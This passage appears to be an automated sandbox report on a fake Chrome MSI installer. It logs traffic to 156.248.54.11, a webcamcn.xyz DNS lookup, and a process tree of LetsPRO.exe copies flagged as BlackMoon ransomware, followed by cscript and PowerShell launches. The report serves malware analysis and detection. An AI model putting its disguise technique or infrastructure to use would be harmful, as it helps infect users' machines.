                                      Apr 26, 2024 12:53:45.741168022 CEST49719443192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:47.724289894 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:50.807812929 CEST49719443192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:50.807846069 CEST44349719156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:50.807903051 CEST49719443192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:50.807908058 CEST44349719156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:50.807977915 CEST44349719156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:01.974834919 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:02.989736080 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:03.344388008 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:03.344599962 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:08.851469040 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:08.927257061 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:09.206721067 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:09.281701088 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:10.255393982 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:10.610054016 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:10.610827923 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:10.611150980 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:11.016869068 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:21.630861998 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:22.364747047 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:22.903434038 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:22.958482981 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:23.074249029 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:23.477905989 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:40.380440950 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:40.735306978 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:40.786572933 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:40.840831995 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:41.246438980 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:59.818231106 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:55:00.174170971 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:55:00.328144073 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:55:00.732057095 CEST8049723156.248.54.11192.168.2.5
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Apr 26, 2024 12:53:34.047715902 CEST | 64791 | 53 | 192.168.2.5 | 1.1.1.1
                                      Apr 26, 2024 12:53:34.181503057 CEST | 53 | 64791 | 1.1.1.1 | 192.168.2.5
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Apr 26, 2024 12:53:34.047715902 CEST | 192.168.2.5 | 1.1.1.1 | 0x2de2 | Standard query (0) | 156.248.54.11.webcamcn.xyz | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Apr 26, 2024 12:53:34.181503057 CEST | 1.1.1.1 | 192.168.2.5 | 0x2de2 | No error (0) | 156.248.54.11.webcamcn.xyz | | 156.248.54.11 | A (IP address) | IN (0x0001) | false
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.5 | 49717 | 156.248.54.11 | 80 | 4320 | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      1 | 192.168.2.5 | 49717 | 156.248.54.11 | 80


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.5 | 49723 | 156.248.54.11 | 80 | 4320 | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      3 | 192.168.2.5 | 49723 | 156.248.54.11 | 80



                                      Target ID:0
                                      Start time:12:52:54
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sutup-Chrome.13.26.x64.msi"
                                      Imagebase:0x7ff691f80000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:1
                                      Start time:12:52:54
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                      Imagebase:0x7ff691f80000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:3
                                      Start time:12:52:56
                                      Start date:26/04/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774
                                      Imagebase:0x390000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      • Detection: 17%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:false

                                      Target ID:5
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:6
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:8
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 0%, ReversingLabs
                                      • Detection: 0%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      Target ID:9
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:10
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:11
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:12
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:13
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:14
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:15
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:16
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\ChromeSetup.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\ChromeSetup.exe"
                                      Imagebase:0x10000
                                      File size:1'376'816 bytes
                                      MD5 hash:8884A9547AA410B697EFAD097F2B0013
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      • Detection: 0%, Virustotal
                                      Reputation:low
                                      Has exited:false

                                      Target ID:17
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:18
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:19
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:20
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:21
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:22
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:23
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:24
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:25
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:26
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:27
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:28
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:29
                                      Start time:12:52:59
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001D.00000002.2130966068.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:30
                                      Start time:12:53:03
                                      Start date:26/04/2024
                                      Path:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
                                      Imagebase:0x120000
                                      File size:162'080 bytes
                                      MD5 hash:BAF0B64AF9FCEAB44942506F3AF21C87
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      Target ID:31
                                      Start time:12:53:07
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001F.00000002.2207790099.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:33
                                      Start time:12:53:27
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\cscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:cscript C:\Users\user\99944\144977.vbs
                                      Imagebase:0x7ff7214b0000
                                      File size:161'280 bytes
                                      MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:34
                                      Start time:12:53:28
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c cscript C:\Users\user\99944\144977.vbs
                                      Imagebase:0x7ff74c1b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:35
                                      Start time:12:53:28
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\cscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:cscript C:\Users\user\99944\144977.vbs
                                      Imagebase:0x7ff7214b0000
                                      File size:161'280 bytes
                                      MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:36
                                      Start time:12:53:28
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:12:53:30
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
